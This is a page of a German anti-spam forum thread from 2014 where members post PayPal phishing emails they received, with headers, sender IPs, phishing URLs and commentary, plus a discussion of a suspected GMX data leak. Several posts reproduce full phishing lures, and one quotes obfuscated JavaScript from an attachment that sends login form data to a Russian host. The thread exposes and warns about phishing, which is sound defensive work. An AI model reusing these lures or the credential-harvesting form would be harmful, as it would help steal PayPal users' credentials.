Seite 38 von 75 ErsteErste ... 28363738394048 ... LetzteLetzte
Ergebnis 371 bis 380 von 746

Thema: Paypal-Phishing

  1. #371
    Senior Mitglied Avatar von DJANGO
    Registriert seit
    24.12.2006
    Beiträge
    2.669

    Standard

    Isch aaabe abber kein Paypal-Konto..... - Wiesbaden hat andere PLZ, und eine Ahnertstr. gibts nur in Chemnitz.
    Betrugsverdacht 5231-7079-2320-7023
    Ihr Konto wurde geändert

    Guten Tag, *** ***
    Wir möchten nur kurz bestätigen, dass Sie eine Adresse in Ihrem PayPal-Konto hinterlegt haben.
    Hier die Details:
    Name: *** ***
    Adresse: Ahnertstraße 39
    79754 Wiesbaden
    Deutschland
    Wenn Sie diese Änderung nicht vorgenommen haben, lassen Sie es uns umgehend wissen. Es ist wichtig, uns Bescheid zu geben, damit wir sicherstellen können, dass niemand ohne Ihr Wissen auf Ihr Konto zugreift.

    Herzliche Grüße
    Ihr PayPal Team

    header:
    01: Return-Path: info [at] amazon.de
    02: Received: from jean.eatserver.nl ([195.20.9.88]) by mx-ha.gmx.net (mxgmx109)
    03: with ESMTPS (Nemesis) ID: [ID filtered]
    04: Received: from goirke-hasselt.nl (static.175.7.9.5.clients.your-server.de
    05: [5.9.7.175]) (authenticated bits=0) by jean.eatserver.nl (8.13.8/8.13.8) with SMTP
    06: ID: [ID filtered]
    07: Date: Sun, 20 Jul 2014 xx:xx:xx +0200
    08: Message-ID: [ID filtered]
    09: From: =?UTF-8?B?c2VydmljZUBwYXlwYWwuY29t?= <service [at] paypal.com>
    10: To: "***@Gmx.De" <***@Gmx.De>
    11: Subject: =?UTF-8?B?QmV0cnVnc3ZlcmRhY2h0IDUyMzEtNzA3OS0yMzIwLTcwMjM=?=
    12: X-Mailer: baf960132476ee7fd7205dbcc3b2ffdb.php
    13: MIME-Version: 1.0
    14: Content-Type: text/html; charset="UTF-8"
    15: Content-Transfer-Encoding: quoted-printable
    16: X-MIME-Autoconverted: from 8bit to quoted-printable by jean.eatserver.nl ID: [ID
    17: filtered]
    18: Envelope-To: <***@Gmx.De>
    19: X-GMX-Antispam: 0 (Mail was not recognized as spam); Detail=V3;
    20: X-GMX-Antivirus: 0 (no virus found)
    21: X-UI-Filterresults: notjunk:1;V01:K0:6POI2KnyDTo=:EzVlwN90S1A7QYFmvdXGtA2mRQ
    22: YS3Q2cYLNFgXLAmrLiq7nyJIqXB6ne9bJuLRUjrUsAr6wWNwACr3YmTtc8YCNpbBKu33laxcn
    23: +9+RKH5KFbU3lQlzOO0JZIC++cKGPGdgnPJdYrLhiNXM+hK48dUJsFMyTNljdmR3fUJSl4wCD
    24: 3RHSRsdy8T4gNgGtxK+Dva0wsY17TTkLpOmCZyz1FPl1xF5NI6b1ZXPjeRj/LihZNMNt9sLQm
    25: wrtCorMIrbaYgdDYbgcom0KxU7gTDB5fOAnzEDFtEKN8jxHry90MNupmr7cfjBoRM+i/qag98
    26: XDeVyJqdVgEc9RKUpvb32dGMQzNqSms/GM/WK5SzEN57nY19jnfoOfVaij1Soevyv+OfNm0oC
    27: TX5jEE/BSNQ5P4M4PSSK7TSaaLTgF3N+CSH/xeZj/AkU7ytCHLTNIYCpaah4pubuuXzI121pN
    28: rjGnF3n7kF4VauDbhjYCoArIcY8U/xKWu4tCdAvq9jZsmhsfuA+cV4KJFaNjO18OcdupMGl+h
    29: K5BGiScpWFNnBB1u0JJJfSP+zGOyQ+RXPiJ63L+wr8vZes/chF/IpyuSDprnUtZGeVtd3N7Nl
    30: BPVPEmstCeQLmOoE56d2jyRWWOqQPuib+CAkEj+CtuOIH6MKs6oFGRPXUD0HvudZrzy9MLz03
    31: nMo4Vi4OvfEwP+lbL2tc3muSWp1DQ/xk5coy6kwxZzAJ3n6v9Ilqq7dkZObr1tstzpAraPUBz
    32: YbyIimg59AWFtQy5HJJ1iMVprsHxr+kUuBf6jhpz6BMbwZmbqQfX6vzlZTiN5cnOMaBzVRLys
    33: xKsiLZvdMDeH4EVJTWsJwBStUsmlztZtDCAWyQVdcbjpm636QZsKK4X8/b2Lc/r1SVG+nUncf
    34: QU5YAgamSzHp+meuYGEtm76GBcKxrUoABTE7ghweWxV1lEhNp92QeTO76L0jHpRZ42Xb4QTFW
    35: XVksIjWYKpz8+QjhCD3CFGCpYs/NnSUEMm3V/rTqMYqeiYI9GXaOht3s6DMfdzGWw9OLnB4Ad
    36: nnll7xDt4MEJ15tz4n9MFjVIg7xN1AR4X8QkcN+0ppq3X7TQUuUN9cwCTSm/lku5TN/PeuHEv
    37: ncfq+hDrt8KnZevn4bIjwYtAuSZLM0oysJquNfWgzI6ZPNsso8XbxfUaSOuuoMhrBJEr/RpC8
    38: +KkEVkv/D6NsGK6yg8+nEms7o4S6HU+hzjE+UX8pQnyFl+Um8g7Z5WZzH17zpijZxen885Vto
    39: UkGhydmTsBXPiBjmxsFHH2rsALCeSymt8ffINQdtf/G5vam/lrdnGTqkWP5VJfpPScn3Cw+Vo
    40: g5guSobJ39X1Ucz6dPqwGu5c9GnmK+ySdhApJmkrk4qsZOonQyuWO3Ee7ZUht8frJXmFEBKGm
    41: 9qUOMUcQn1vBxO8R4SU4f560gw5NHgffVMFcUQIoR/acLhTIY9cTbitVWhAQPlGZ4kVX0nIGc
    42: 0KHBkQl9lby/+J+qP2JrGjWY1u4cisMFJjg8JiJBtyIvY+vVvQLayY5UQgj9MpVl2VNzr9eA8
    43: w0YkvbqzF6JCjeYZF4Z2A1lYlibnYjY3PkUtq9LxMQPfyjAawk7z9N6tAxMVSDaYf+6S5ngZH 7P9nTFNyBdw=
    Geändert von DJANGO (21.07.2014 um 08:26 Uhr)
    Requiem für die Grünen oder aber: "Auch Sonnenblumen welken, wenn man sie mit zuviel Sch**ße düngt"

  2. #372
    Mitglied Avatar von madman70
    Registriert seit
    09.05.2012
    Ort
    Filderstadt
    Beiträge
    108

    Standard Nicht vergessen: Bitte bestätigen Sie Ihre Kontoinformationen

    Mail kam leider ohne Inhalt (Nachladen des Textes nicht erfolgreich) - entweder ist der Spammer schon wieder down oder mein Thunderbird wollte mich verschonen...

    Wenn der Inhalt nicht lesbar wäre, sollte ich hier draufklicken: whois: [Link nur für registrierte Mitglieder sichtbar. ] (ID entfernt)...

    Der Absender:


    header:
    01: Received: from s-w-server.de ([85.88.29.86]) by mx-ha.web.de (mxweb106) with
    02: ESMTP (Nemesis) ID: [ID filtered]
    03: Jul 2014 xx:xx:xx +0200
    04: Received: from 130.255.189.78 (viveksolar.vecsmtp.com [130.255.189.78])
    05: by s-w-server.de (Postfix) with ESMTPA ID: [ID filtered]
    06: for <poor [at] spamvictim.tld>; Sun, 20 Jul 2014 xx:xx:xx +0200 (CEST)

    Eingekippt wohl in den Niederlanden whois:130.255.189.78...

  3. #373
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.069

    Standard

    Und wieder mal der Ganove mit HTML-Anhang-Kit:


    header:
    01: Received: from cpanel.advancedbatterysupplies.com ([78.129.158.223]) by
    02: mx-ha.gmx.net (mxgmx003) with ESMTPS (Nemesis) ID: [ID filtered]
    03: Received: from mail.meidlinger.de ([217.92.26.156]:64289 helo=User) by
    04: cpanel.advancedbatterysupplies.com with esmtpa (Exim 4.80) (envelope-from
    05: <ebilling [at] ppl.com>) ID: [ID filtered]

    PayPal

    Hello,

    After a thorough check,we detected irregular activity on your account.

    For your protection, we limit it to your data account.

    *Please download the attached document and fill out this form.*

    *NOTE: If you ignore this mail your account is locked.*

    Because we continuously improve our systems, please pay attention to our
    messages about your account.

    Thank you PayPal.

    Regards
    Team of PayPal

    Help Center| Security Center

    Please do not reply to this e-mail. Emails to this address are not read
    by us.
    To speak with a member of our customer service, log into your PayPal
    account and
    click below on "Contact".

    Copyright © 2014 PayPal. All rights reserved.

    PayPal (Europe) S.à r.l.et Cie, S.C.A.
    Société en Commandite par Actions
    Sitz: 22-24 Boulevard Royal, L-24
    Gephisht wird hier:

    [HTML]http://visafilms.com.br/administrator/components/com_fpss/fpss.php[/HTML]

    Natürlich steht da der Hosenlatz offen. Interessant auch: whois: [Link nur für registrierte Mitglieder sichtbar. ]
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  4. #374
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.069

    Standard

    Das müffelt wieder nach derselben Bande:


    header:
    01: Received: from server.maxaware.com ([69.175.61.82]) by mx-ha.gmx.net (mxgmx102)
    02: with ESMTPS (Nemesis) ID: [ID filtered]
    03: Received: from ucl.arvixevps.com ([108.175.151.158]:60853 helo=User) by
    04: server.maxaware.com with esmtpa (Exim 4.80) (envelope-from <protect [at] pyapal.com>) ID:
    05: [ID filtered]
    06: charset="Windows-1251"

    PayPal

    We detected irregular activity on your account.

    For your protection, we limit it to your data account.

    *Please Download whois: [Link nur für registrierte Mitglieder sichtbar. ] the
    attached
    document and fill out this form.*

    If you ignore this mail your account is locked.

    Because we continuously improve our systems, please pay attention to our
    messages about your account.

    Thank you,
    IP: 65.39.242.4 ---> hm1.hostingmetro.com

    Man beachte: 'Phishing-Kit für Doofe'

    - Englischer Text, aber Zeichensatz Kyrillisch definiert.

    - das Phishing-Ziel (Paypal) wird am Anfang des Textbausteins genannt, damit auch der blödeste Phisher nicht die Orientierung verliert...

    - Nach dem 'Thank You' kriegt er nicht einmal mehr die Unterschrift zustande

    Sind da Mugus am werkeln?
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  5. #375
    Urinstein Avatar von schara56
    Registriert seit
    03.08.2005
    Ort
    zuhause
    Beiträge
    10.601

    Standard


    header:
    01: Received: from mail8.visionteam.dk (mail8.visionteam.dk [176.9.155.14])
    02: (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
    03: (No client certificate requested)
    04: by x (Postfix) with ESMTPS ID: [ID filtered]
    05: for <x>; Wed, 13 Aug 2014 xx:xx:xx +0200 (CEST)
    06: Received: from User ([199.188.100.68])
    07: by mail8.visionteam.dk (IceWarp 11.0.1.1 RHEL5) with ASMTP ID: [ID filtered]
    08: Wed, 13 Aug 2014 xx:xx:xx +0200
    Im Anhang eine PayPal.html mit - unter anderem - folgenden Inhalt:
    Code:
    <!--
    document.write(unescape('%3C%66%6F%72%6D%20%6D%65%74%68%6F%64%3D%22%70%6F%73%74%22%20%6F%6E%73%75%62%6D%69%74%3D%22%72%65%74%75%72%6E%20%76%61%6C%69%64%61%74%65%46%6F%72%6D%4F%6E%53%75%62%6D%69%74%28%74%68%69%73%29%22%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%61%2E%6E%64%73%70%70%2E%72%75%2F%64%65%2F%63%67%69%2D%62%69%6E%2F%77%65%62%73%63%72%2E%70%68%70%3F%63%6D%64%3D%5F%6C%6F%67%6F%75%74%22%3E'));
    //-->
    </Script>
    [Link nur für registrierte Mitglieder sichtbar. ] sieht das dann so aus:
    [html]<form method="post" onsubmit="return validateFormOnSubmit(this)" action="http://a.ndspp.ru/de/cgi-bin/webscr.php?cmd=_logout">'[/html]
    whois: [Link nur für registrierte Mitglieder sichtbar. ]/webscr.php?cmd=_logout (whois:46.166.160.95)
    Villains who twirl their mustaches are easy to spot.
    Those who cloak themselves in good deeds are well camouflaged.

    Sokath! His eyes uncovered!

  6. #376
    Neues Mitglied
    Registriert seit
    10.08.2014
    Beiträge
    7

    Standard

    Hallo,

    habe das hier bekommen:

    PayPal <../../dereferrer?redirectUrl=https%3A%2F%2Fwww.paypal.com%2Fde>




    Ihr Konto wurde geändert

    Sehr geehrte, ******, ******

    Wir möchten nur kurz bestätigen, dass Sie eine Adresse in Ihrem PayPal-Konto
    hinterlegt haben.


    Hier die Details:

    Name: ***** *****
    Adresse: Rhönstraße 53
    91623 Bremen
    Deutschland

    Wenn Sie diese Änderung nicht vorgenommen haben, lassen Sie es uns umgehend
    wissen
    <http://www.paypal.com.verify-secure.net/de/securesrc/[Schnippschnapp]>. Es
    ist wichtig, uns Bescheid zu geben, damit wir sicherstellen können, dass niemand
    ohne Ihr Wissen auf Ihr Konto zugreift.

    Viele Grüße
    Ihr PayPal



    Hilfe-Center
    <../../dereferrer?redirectUrl=https%3A%2F%2Fwww.paypal.com%2Fde%2Fcgi-bin%2Fhelpweb%3Fcmd%3D_help>|
    Sicherheits-Center
    <../../dereferrer?redirectUrl=https%3A%2F%2Fwww.paypal.com%2Fde%2Fsecurity>

    Bitte antworten Sie nicht auf diese E-Mail. E-Mails an diese Adresse werden von
    uns nicht gelesen. Um mit einem Mitarbeiter unseres Kundenservice zu sprechen,
    loggen Sie sich in Ihr PayPal-Konto ein und klicken Sie unten auf "Kontakt".

    Copyright © 1999-2014 PayPal. Alle Rechte vorbehalten.

    PayPal (Europe) S.à r.l.et Cie, S.C.A.
    Société en Commandite par Actions
    Sitz: 22-24 Boulevard Royal, L-2449 Luxemburg
    RCS Luxemburg B 118 349

    PayPal-E-Mail-ID [schnippschnapp]
    Daß das Ganze als Spam einzuordnen ist, ist mir klar. Mich wundert nur, dass in der Mail der korrekte Name auftaucht. Die betreffende Mail-Adresse bei GMX wird eigentlich nicht benutzt und zu der "offiziellen" Adresse bei GMX habe ich noch eine Alias-Adresse angelegt vom Typ "Gänseblü [Link nur für registrierte Mitglieder sichtbar. ]", hier eingehende Post leitet GMX ja automatisch auf meine "gute" Adresse um.
    Frage: Deutet das auf einen geknackten Account bei GMX hin und was muss ich tun? Passwort bei GMX wurde schon geändert ehe diese Mail kam. Ach so, PayPal-Konto besitzt niemand in unserer Familie!
    Geändert von Mittwoch (19.08.2014 um 21:54 Uhr) Grund: Link entpersonalisiert
    Mit freundlichen Grüßen
    Eknarf

    ---> Mit dem Computer lösen wir die Probleme, die wir ohne ihn nicht hätten! <---

  7. #377
    Mittwoch
    Gast

    Standard

    Zitat Zitat von Eknarf Beitrag anzeigen
    Daß das Ganze als Spam einzuordnen ist, ist mir klar.
    Das ist ein Phishing-Versuch, denn die Zielseite whois:verify-secure.net gehört nicht zu PayPal. Sie ist zwar mit deutschen Daten registriert, die aber mit hoher Wahrscheinlichkeit gefälscht sind.


    Zitat Zitat von Eknarf Beitrag anzeigen
    Mich wundert nur, dass in der Mail der korrekte Name auftaucht.
    Dieses Phänomen beobachtet man bei GMX schon seit etwa eineinhalb Jahren. Leider ist offiziell nie bestätigt worden, dass die GMX-Datenbank gehackt wurde.

    In meinem Fall habe ich bei GMX einen Fakeaccount mit Fakenamen. Letzteren habe ich nirgendwo im Netz hinterlassen, dennoch kriege ich Mails auf diese GMX-Mailadresse in der ich mit dem "korrekten" Namen angesprochen werde. Der Zugang selber ist so gut wie sicher nicht gehackt worden, denn das Passwort ist mit pwgen mit hoher Sicherheitseinstellung generiert worden und hat 35 Zeichen. Auf meinem Rechner gibt es kein Leck, das ist ziemlich sicher.

    Zitat Zitat von Eknarf Beitrag anzeigen
    Frage: Deutet das auf einen geknackten Account bei GMX hin und was muss ich tun? Passwort bei GMX wurde schon geändert ehe diese Mail kam.
    Wie gesagt, vermutlich wurde die DB gehackt. Wenn GMX darin die Passwörter im Klartext ablegt, gehören sie eigentlich wegen Dummheit bestraft. Und übliche Speichermethoden für Passwörter, z.B. ordentlich implementiertes Salted Hash, sind in vertretbarem Aufwand nicht zu dechiffrieren, jedenfalls AFAIK. Die Hacker dürften also bestenfalls "nur" die Mailadresse und einige persönliche Daten haben.

    Sofern Du einen Free-Account nutzt und dort keine kritischen Daten wie z.B. Bankverbindung hinterlegt hast, würde ich mir dann keine Sorgen machen, wenn Du das Passwort regelmäßig änderst und dabei lange, schwer zu knackende Passwörter verwendest. Ansonsten würde ich GMX auffordern, Stellung zum möglichen Datenleck zu nehmen. Die United Internet wird allerdings vermutlich nicht reagieren oder wenn, dann nur mit Ausflüchten.

    Schönen Gruß
    Mittwoch

  8. #378
    Neues Mitglied
    Registriert seit
    10.08.2014
    Beiträge
    7

    Standard

    Hallo
    und danke für die schnelle Antwort.
    Mit GMX werde ich mich nicht anlegen - keine Lust auf dumme Ausreden. Vielleicht lösche ich den Account und lege ihn neu an -mit einer 002 hinter dem Namen. Dann gibt es immer noch knapp 1000 Möglichkeiten, die Spammer ins Leere leufen zu lassen.
    Mit freundlichen Grüßen
    Eknarf

    ---> Mit dem Computer lösen wir die Probleme, die wir ohne ihn nicht hätten! <---

  9. #379
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.069

    Standard

    Leider habe ich mit GMX dieselben Erfahrungen. Da schlägt auch Spam auf die Adresse ein, wo die Anrede mit korrektem Namen erfolgt. Und ich bin mir ebenfalls sehr sicher, dass der Account nicht von meiner Seite aus kompromittiert wurde. Auch im Netz findet man weitere ähnliche Berichte. Entweder wurde dort die Datenbank (zumindestens teilweise) gecrackt (aber es wurde nie zugegeben) oder es wurden Daten weiterverkauft. Anders kann ich mir das nicht zusammenreimen.
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  10. #380
    Senior Mitglied
    Registriert seit
    17.07.2005
    Ort
    Mitteldeutschland
    Beiträge
    1.564

    Standard


    header:
    01: Received: from howone.com.tw ([210.64.215.29]) by COL004-MC1F45.hotmail.com
    02: with Microsoft SMTPSVC(7.5.7601.22712);
    03: Mon, 25 Aug 2014 xx:xx:xx -0700
    04: Received: by howone.com.tw (Postfix, from userID: [ID filtered]
    05: ID: [ID filtered]
    06: From: PayPal <paypal [at] e.paypal.co.de>
    07: Reply-To:
    08: Subject: (URGENT) your account will be limited


    whois: [Link nur für registrierte Mitglieder sichtbar. ]
    ->
    whois: [Link nur für registrierte Mitglieder sichtbar. ]
    whois: [Link nur für registrierte Mitglieder sichtbar. ]

Seite 38 von 75 ErsteErste ... 28363738394048 ... LetzteLetzte

Ähnliche Themen

  1. Paypal Phishing von deutschem Server?
    Von Coke1984 im Forum 1.4 Phishing/Geldwäsche/Viren/Exploits
    Antworten: 3
    Letzter Beitrag: 11.04.2007, 15:17
  2. [phishing] PayPal Security Measures
    Von Sirius im Forum 1.4 Phishing/Geldwäsche/Viren/Exploits
    Antworten: 14
    Letzter Beitrag: 11.08.2005, 00:05
  3. [phishing] PayPal
    Von Maq im Forum 1.4 Phishing/Geldwäsche/Viren/Exploits
    Antworten: 11
    Letzter Beitrag: 19.03.2005, 20:21
  4. PayPal Phishing ?
    Von rumbarumbatätärräää im Forum 1.4 Phishing/Geldwäsche/Viren/Exploits
    Antworten: 1
    Letzter Beitrag: 19.12.2004, 00:04

Stichworte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen